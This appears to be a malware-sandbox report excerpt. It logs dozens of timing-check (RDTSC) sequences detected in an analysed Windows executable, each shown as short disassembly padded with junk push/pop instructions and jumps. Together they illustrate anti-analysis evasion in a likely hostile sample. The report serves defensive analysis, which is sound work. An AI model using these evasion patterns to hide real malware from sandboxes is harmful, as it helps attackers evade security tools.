                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13BE9F7 second address: 13BEA26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jmp 00007F11F8D51842h 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 jmp 00007F11F8D5183Fh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1410231 second address: 1410235 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1410235 second address: 141023B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140F1B5 second address: 140F24E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F11F8F18C28h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D3317h], ecx 0x00000028 push dword ptr fs:[00000000h] 0x0000002f mov di, FB69h 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a jmp 00007F11F8F18C30h 0x0000003f mov eax, dword ptr [ebp+122D068Dh] 0x00000045 sub dword ptr [ebp+122D1B2Ch], edi 0x0000004b push FFFFFFFFh 0x0000004d push 00000000h 0x0000004f push edi 0x00000050 call 00007F11F8F18C28h 0x00000055 pop edi 0x00000056 mov dword ptr [esp+04h], edi 0x0000005a add dword ptr [esp+04h], 0000001Dh 0x00000062 inc edi 0x00000063 push edi 0x00000064 ret 0x00000065 pop edi 0x00000066 ret 0x00000067 je 00007F11F8F18C2Ch 0x0000006d sub dword ptr [ebp+122D197Fh], ecx 0x00000073 push eax 0x00000074 push eax 0x00000075 push edx 0x00000076 pushad 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140F24E second address: 140F262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11F8D5183Fh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141B541 second address: 141B554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 je 00007F11F8F18C32h 0x0000000b jne 00007F11F8F18C26h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141B554 second address: 141B558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141AC89 second address: 141AC8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141AC8F second address: 141ACA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 jng 00007F11F8D5184Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141ACA1 second address: 141ACA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141ADF7 second address: 141ADFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141ADFB second address: 141AE05 instructions: 0x00000000 rdtsc 0x00000002 js 00007F11F8F18C2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141AE05 second address: 141AE0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141AE0F second address: 141AE13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141AF8A second address: 141AF8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141AF8E second address: 141AF9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141AF9C second address: 141AFA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141B0FC second address: 141B102 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141B102 second address: 141B112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14210B7 second address: 14210BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14210BD second address: 14210CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F11F8D51836h 0x0000000a popad 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1427A72 second address: 1427A8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8F18C34h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1427A8A second address: 1427A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1427A95 second address: 1427A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1427A9B second address: 1427ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F11F8D51845h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B2D85 second address: 13B2D8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1426D00 second address: 1426D0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F11F8D51836h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14272FB second address: 1427313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jnc 00007F11F8F18C26h 0x00000010 jp 00007F11F8F18C26h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1427491 second address: 14274B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F11F8D51845h 0x00000008 jp 00007F11F8D51836h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14274B1 second address: 14274F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11F8F18C32h 0x00000009 popad 0x0000000a jnl 00007F11F8F18C39h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push ebx 0x00000013 jmp 00007F11F8F18C30h 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14274F7 second address: 14274FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 142BDC4 second address: 142BDD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 142BDD1 second address: 142BDDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 142BDDA second address: 142BDDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 142BDDE second address: 142BDE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 142BDE2 second address: 142BDEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F11F8F18C26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 142BDEE second address: 142BE05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F11F8D51841h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 142C79A second address: 142C7A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F11F8F18C26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 142C7A6 second address: 142C7B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B9920 second address: 13B9934 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8F18C30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B9934 second address: 13B9948 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F11F8D5183Bh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FDA77 second address: 13FDA7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FDBB3 second address: 13FDBB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FE0A1 second address: 13FE0A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FE0A7 second address: 13FE0AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FE0AB second address: 13FE0CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8F18C30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jnl 00007F11F8F18C30h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FE0CB second address: 13FE0E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push ebx 0x0000000c push ebx 0x0000000d jo 00007F11F8D51836h 0x00000013 pop ebx 0x00000014 pop ebx 0x00000015 mov eax, dword ptr [eax] 0x00000017 push esi 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FE0E6 second address: 13FE0EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FE0EC second address: 13FE142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jmp 00007F11F8D51840h 0x0000000f pop eax 0x00000010 mov dword ptr [ebp+124562A8h], eax 0x00000016 call 00007F11F8D51839h 0x0000001b pushad 0x0000001c jmp 00007F11F8D51840h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F11F8D51849h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FE142 second address: 13FE195 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jng 00007F11F8F18C34h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jmp 00007F11F8F18C33h 0x00000017 mov eax, dword ptr [eax] 0x00000019 push eax 0x0000001a push edx 0x0000001b jp 00007F11F8F18C3Ch 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FE195 second address: 13FE1C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8D5183Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F11F8D51844h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FE1C0 second address: 13FE1C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FE3F3 second address: 13FE3F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FE3F9 second address: 13FE3FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FE3FD second address: 13FE401 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FE401 second address: 13FE44D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F11F8F18C32h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 pushad 0x00000013 jmp 00007F11F8F18C37h 0x00000018 jne 00007F11F8F18C2Ch 0x0000001e popad 0x0000001f mov eax, dword ptr [eax] 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FE44D second address: 13FE467 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8D51846h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1430937 second address: 1430962 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnp 00007F11F8F18C26h 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F11F8F18C26h 0x00000014 jmp 00007F11F8F18C37h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1430A9F second address: 1430AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1430AA7 second address: 1430AC0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F11F8F18C26h 0x00000008 jbe 00007F11F8F18C26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 jc 00007F11F8F18C2Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1430BF8 second address: 1430BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1430BFC second address: 1430C3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8F18C2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F11F8F18C2Ch 0x0000000f jl 00007F11F8F18C26h 0x00000015 pop ebx 0x00000016 push edi 0x00000017 jmp 00007F11F8F18C2Ah 0x0000001c push eax 0x0000001d push edx 0x0000001e jp 00007F11F8F18C26h 0x00000024 jmp 00007F11F8F18C32h 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1435F43 second address: 1435F81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8D51847h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jnl 00007F11F8D5183Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F11F8D51842h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1435F81 second address: 1435F85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143B6E4 second address: 143B6ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143B6ED second address: 143B6F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F11F8F18C26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143A2B1 second address: 143A2BB instructions: 0x00000000 rdtsc 0x00000002 jp 00007F11F8D51836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143A6CF second address: 143A6DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 js 00007F11F8F18C26h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143A6DC second address: 143A6F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F11F8D5183Bh 0x00000011 jno 00007F11F8D51836h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143A6F9 second address: 143A702 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143A702 second address: 143A708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143A708 second address: 143A718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 ja 00007F11F8F18C26h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143AB51 second address: 143AB78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8D51845h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F11F8D5183Eh 0x0000000f js 00007F11F8D51836h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143AB78 second address: 143AB7D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143ACE0 second address: 143ACEE instructions: 0x00000000 rdtsc 0x00000002 jl 00007F11F8D51836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143ACEE second address: 143ACF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143ACF2 second address: 143ACF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143AFAC second address: 143AFB6 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F11F8F18C26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143AFB6 second address: 143AFC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007F11F8D51836h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1439E60 second address: 1439E81 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F11F8F18C2Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F11F8F18C26h 0x00000013 jl 00007F11F8F18C26h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1439E81 second address: 1439E8B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F11F8D51836h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1439E8B second address: 1439E99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F11F8F18C2Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14406A5 second address: 14406C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8D51847h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1443938 second address: 144393C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144393C second address: 1443944 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1443944 second address: 144396F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F11F8F18C3Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F11F8F18C2Ah 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144396F second address: 1443973 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14433B5 second address: 14433BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14433BB second address: 14433C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F11F8D51836h 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144365D second address: 1443667 instructions: 0x00000000 rdtsc 0x00000002 js 00007F11F8F18C26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1443667 second address: 1443687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F11F8D51848h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446C98 second address: 1446C9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446E45 second address: 1446E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446E4B second address: 1446E51 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
